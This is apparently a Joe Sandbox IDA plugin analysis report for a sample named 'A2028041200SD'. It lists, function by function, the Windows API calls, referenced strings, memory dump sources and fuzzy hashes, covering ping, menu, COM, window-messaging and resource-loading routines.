                                                                        • VariantInit.OLEAUT32(?), ref: 0094AF6E
                                                                        • VariantClear.OLEAUT32(?), ref: 0094AFCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 834269672-1287834457
                                                                        • Opcode ID: ff4d07e6a666395505c978d88bc3b0a619a5479d241020f830b31a2137eb6c8d
                                                                        • Instruction ID: 9b08ad9f51d12a026ad5fa8d86d5c8d6881e8923d4a266597952583abe02a124
                                                                        • Opcode Fuzzy Hash: ff4d07e6a666395505c978d88bc3b0a619a5479d241020f830b31a2137eb6c8d
                                                                        • Instruction Fuzzy Hash: 68619771248311AFD710DF64C888F6BBBE8AF89714F104849F9959B2A1C774ED48CB93
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00948168
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 009481AD
                                                                        • gethostbyname.WSOCK32(?), ref: 009481B9
                                                                        • IcmpCreateFile.IPHLPAPI ref: 009481C7
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00948237
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0094824D
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009482C2
                                                                        • WSACleanup.WSOCK32 ref: 009482C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 7b16125d3787ab5fd930607562df312d6d4b594d740f6a73b999f16fd5beb80c
                                                                        • Instruction ID: fa26a0e431caf6b014b000cbfab28dc26a169c5cce993c324a3aaad96739a56b
                                                                        • Opcode Fuzzy Hash: 7b16125d3787ab5fd930607562df312d6d4b594d740f6a73b999f16fd5beb80c
                                                                        • Instruction Fuzzy Hash: D0517C31604600AFD710AF64CC45F2FB7E8EF48750F04892AFA6ADB2A0DB74E905DB42
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00959E5B
                                                                        • CreateMenu.USER32 ref: 00959E76
                                                                        • SetMenu.USER32(?,00000000), ref: 00959E85
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00959F12
                                                                        • IsMenu.USER32(?), ref: 00959F28
                                                                        • CreatePopupMenu.USER32 ref: 00959F32
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00959F63
                                                                        • DrawMenuBar.USER32 ref: 00959F71
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                        • String ID: 0
                                                                        • API String ID: 176399719-4108050209
                                                                        • Opcode ID: 41c07993da3c9fa376a0ec5740ba4ee57f4656ddccab4e220be513c6029e2930
                                                                        • Instruction ID: db6e6f79b2aeafa93938968d462dc12c7e2b7a1b48cf71962f7b08f86ae66294
                                                                        • Opcode Fuzzy Hash: 41c07993da3c9fa376a0ec5740ba4ee57f4656ddccab4e220be513c6029e2930
                                                                        • Instruction Fuzzy Hash: D04165B5A11209EFEB10CF65D944BAABBB9FF48315F144128FD4AA7360D330AD18DB50
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093E396
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0093E40C
                                                                        • GetLastError.KERNEL32 ref: 0093E416
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0093E483
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: a59d57a6d7019d5cde41b5d29e1af711d1c81a17785d396302121377f4dbad6c
                                                                        • Instruction ID: 57a7744449218976fa3f6e339b8d12932bcb076c8bd53965e3d5b4bd6ddf599f
                                                                        • Opcode Fuzzy Hash: a59d57a6d7019d5cde41b5d29e1af711d1c81a17785d396302121377f4dbad6c
                                                                        • Instruction Fuzzy Hash: 1F316135A00209AFDB01EB68C949ABEB7B8FF49714F148425F905EB2E1D770AA41CF91
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0092B98C
                                                                        • GetDlgCtrlID.USER32 ref: 0092B997
                                                                        • GetParent.USER32 ref: 0092B9B3
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0092B9B6
                                                                        • GetDlgCtrlID.USER32(?), ref: 0092B9BF
                                                                        • GetParent.USER32(?), ref: 0092B9DB
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0092B9DE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: d5b8661024af76f32fc1b76b21b632bb19835b6ca5b9fd0f76f86bc3453dc825
                                                                        • Instruction ID: de259bee570ac89a0929d46ba92666481a9e0a9572572e9b5b49cf471602e55f
                                                                        • Opcode Fuzzy Hash: d5b8661024af76f32fc1b76b21b632bb19835b6ca5b9fd0f76f86bc3453dc825
                                                                        • Instruction Fuzzy Hash: 2821F575900108BFDB04ABB4DC86EFEBBB8EF89314F10011AF655A32E5DB745955EB20
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0092BA73
                                                                        • GetDlgCtrlID.USER32 ref: 0092BA7E
                                                                        • GetParent.USER32 ref: 0092BA9A
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0092BA9D
                                                                        • GetDlgCtrlID.USER32(?), ref: 0092BAA6
                                                                        • GetParent.USER32(?), ref: 0092BAC2
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0092BAC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 6a5381e9f5fcd52d64fe9cab3e40d29b1e183aabb2a21fc884b1e0a711f99945
                                                                        • Instruction ID: c63e8f3207c9d8f6309b21ab56ff078553abca6613045d919e2b8720306fc906
                                                                        • Opcode Fuzzy Hash: 6a5381e9f5fcd52d64fe9cab3e40d29b1e183aabb2a21fc884b1e0a711f99945
                                                                        • Instruction Fuzzy Hash: 3921C2B5A00118BFDB00ABA4DC85EFEBBB9EF49300F100015F555A3195DBB9595AAB20
                                                                        APIs
                                                                        • GetParent.USER32 ref: 0092BAE3
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0092BAF8
                                                                        • _wcscmp.LIBCMT ref: 0092BB0A
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0092BB85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 7117d30824949e2b8b91b4d889e0852a41494b3108ff131f206600b6334e2caa
                                                                        • Instruction ID: d4dfd503aa47a277deba90deb26c29c9e5856fd18b7b46bfc6b839a2cb706729
                                                                        • Opcode Fuzzy Hash: 7117d30824949e2b8b91b4d889e0852a41494b3108ff131f206600b6334e2caa
                                                                        • Instruction Fuzzy Hash: F111067770C317F9FA206724FC0BEA637ECAF91724B200022F909E40D9EBA6A8915554
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0094B2D5
                                                                        • CoInitialize.OLE32(00000000), ref: 0094B302
                                                                        • CoUninitialize.OLE32 ref: 0094B30C
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0094B40C
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0094B539
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0094B56D
                                                                        • CoGetObject.OLE32(?,00000000,0097D91C,?), ref: 0094B590
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0094B5A3
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0094B623
                                                                        • VariantClear.OLEAUT32(0097D91C), ref: 0094B633
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: f0eeca59c16f3262e8aec09f034b99f21c2ba3a977aba4e4c9bd95885b69e501
                                                                        • Instruction ID: b2279322efebecd329dd3bf06640a494ad5799c501f90cf2d8138fa3367b6b21
                                                                        • Opcode Fuzzy Hash: f0eeca59c16f3262e8aec09f034b99f21c2ba3a977aba4e4c9bd95885b69e501
                                                                        • Instruction Fuzzy Hash: C6C1E0B1608305AFC700DF69C884A6AB7E9BF89308F04495DF58ADB261DB71ED45CB52
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 009367FD
                                                                        • __swprintf.LIBCMT ref: 0093680A
                                                                          • Part of subcall function 0091172B: __woutput_l.LIBCMT ref: 00911784
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00936834
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00936840
                                                                        • LockResource.KERNEL32(00000000), ref: 0093684D
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 0093686D
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0093687F
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0093688E
                                                                        • LockResource.KERNEL32(?), ref: 0093689A
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009368F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: 7633ad735dfe28c75349fae40e499e7873c146f8681b74745b938f885ca50e60
                                                                        • Instruction ID: 75dafd914043c95a3a6e533697610c3ada3182c13a7dab71e26954081dbc11b8
                                                                        • Opcode Fuzzy Hash: 7633ad735dfe28c75349fae40e499e7873c146f8681b74745b938f885ca50e60
                                                                        • Instruction Fuzzy Hash: 7F319E72A0521ABBDB109F60DD59ABF7BBCFF08340F008425F916E2151E734D952EBA0
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00934047
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009330A5,?,00000001), ref: 0093405B
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00934062
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 00934071
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00934083
                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 0093409C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 009340AE
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 009340F3
                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 00934108
                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 00934113
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 95ade67b9b9aeccca60191fc89a3592efa438c0bbeb50907ec65708422737b76
                                                                        • Instruction ID: 8fce522e2af56a80ae1502f969fbd0b3f7bf7868aa290b63702ae79601b33171
                                                                        • Opcode Fuzzy Hash: 95ade67b9b9aeccca60191fc89a3592efa438c0bbeb50907ec65708422737b76
                                                                        • Instruction Fuzzy Hash: 2031BF72628614ABDB10DB94DC85B797BBDAF60321F12C115FD08E6290CBB4EA809F60
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 0090B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0090B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0090B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 0090B4BD
                                                                        • GetClientRect.USER32(?), ref: 0096DD63
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0096DD7A
                                                                        • GetWindowDC.USER32(?), ref: 0096DD86
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0096DD95
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096DDA7
                                                                        • GetSysColor.USER32(00000005), ref: 0096DDC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: a36976fc2ecfff008735052a66da2126888373c444470e022d976008158e7f36
                                                                        • Instruction ID: 0c45c5dd7689279ded361fe72462c68e6b74c4e626ba2f0cf024424fe2fae3f5
                                                                        • Opcode Fuzzy Hash: a36976fc2ecfff008735052a66da2126888373c444470e022d976008158e7f36
                                                                        • Instruction Fuzzy Hash: D9115132515205EFDB116F74EC08BA97B75EF05325F504625FA6AA50F1CB320981EF10
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,0092CF50), ref: 0092CE90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: bf08f670264e33dac7905826fd8dc0d9ccdbff7b012f8d83a9aa9d7aace0a866
                                                                        • Instruction ID: 6eea896631825cc974ff59f126b4e4c626566325d8037963b82f9286cd8d7cca
                                                                        • Opcode Fuzzy Hash: bf08f670264e33dac7905826fd8dc0d9ccdbff7b012f8d83a9aa9d7aace0a866
                                                                        • Instruction Fuzzy Hash: 6091B17060021AABCB18EF64D481BEEFBB9FF45340F518919E949A7185DF306D99CBE0
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008F30DC
                                                                        • CoUninitialize.OLE32(?,00000000), ref: 008F3181
                                                                        • UnregisterHotKey.USER32(?), ref: 008F32A9
                                                                        • DestroyWindow.USER32(?), ref: 00965079
                                                                        • FreeLibrary.KERNEL32(?), ref: 009650F8
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00965125
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 6211b5bfeb4a0213c065f58410150f89cb23a2df69f43bd0a13915a1a578072f
                                                                        • Instruction ID: 1fc57f94b321b6b359f43211dcdb24c48e0311497c42878da7ef500aff779967
                                                                        • Opcode Fuzzy Hash: 6211b5bfeb4a0213c065f58410150f89cb23a2df69f43bd0a13915a1a578072f
                                                                        • Instruction Fuzzy Hash: A791283460120A9FC715EF28C895B78F3A8FF15304F5582A9E60AA7262DF30AE56CF55
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0090CC15
                                                                          • Part of subcall function 0090CCCD: GetClientRect.USER32(?,?), ref: 0090CCF6
                                                                          • Part of subcall function 0090CCCD: GetWindowRect.USER32(?,?), ref: 0090CD37
                                                                          • Part of subcall function 0090CCCD: ScreenToClient.USER32(?,?), ref: 0090CD5F
                                                                        • GetDC.USER32 ref: 0096D137
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0096D14A
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0096D158
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0096D16D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096D175
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0096D200
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: d199f0512c651a7a28e2c85516532ccb8973c3128624f2c8774b427adfab1cc8
                                                                        • Instruction ID: 45f117672cee8bf96c5137995df691b1ca081f1d36f14632599c0bd451912672
                                                                        • Opcode Fuzzy Hash: d199f0512c651a7a28e2c85516532ccb8973c3128624f2c8774b427adfab1cc8
                                                                        • Instruction Fuzzy Hash: 19712371A05204DFDF25DF64CC81AEA3BB9FF49320F18466AED655A2A6D7308C81DF50
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                          • Part of subcall function 0090B63C: GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                          • Part of subcall function 0090B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0095ED3C
                                                                        • ImageList_EndDrag.COMCTL32 ref: 0095ED42
                                                                        • ReleaseCapture.USER32 ref: 0095ED48
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0095EDF0
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0095EE03
                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0095EEDC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
